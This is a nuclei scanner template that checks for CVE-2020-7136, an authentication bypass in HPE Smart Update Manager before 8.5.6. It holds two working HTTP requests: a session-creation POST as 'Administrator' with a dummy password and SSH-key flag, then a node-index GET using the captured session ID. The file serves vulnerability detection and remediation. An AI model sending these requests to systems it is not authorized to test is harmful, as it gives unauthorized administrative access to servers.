nuclei-templates/http/cves/2020/CVE-2020-7136.yaml

58 lines
2.4 KiB
YAML

id: CVE-2020-7136
info:
name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
author: gy741
severity: critical
description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
reference:
- https://www.tenable.com/security/research/tra-2020-02
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
- https://nvd.nist.gov/vuln/detail/CVE-2020-7136
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-7136
cwe-id: CWE-288
epss-score: 0.21561
epss-percentile: 0.95882
cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: hpe
product: smart_update_manager
tags: cve,cve2020,hp,auth-bypass,hpe,tenable
http:
- raw:
- |
POST /session/create HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
- |
GET /session/{{sessionid}}/node/index HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "hmessage"
- "Command completed successfully."
- "node_name"
condition: and
extractors:
- type: regex
name: sessionid
group: 1
regex:
- '"sessionId":"([a-z0-9.]+)"'
internal: true
part: body
# digest: 4a0a0047304502200ece75ac4e4c8e0772c197f521f9d923244f4017d477898c11c682bc69dc4c2c022100c1579219cd4d0a4b89ac729ac90b12f3ae808cfb44972f765823e41078afe70d:922c64590222798bb761d5b6d8e72950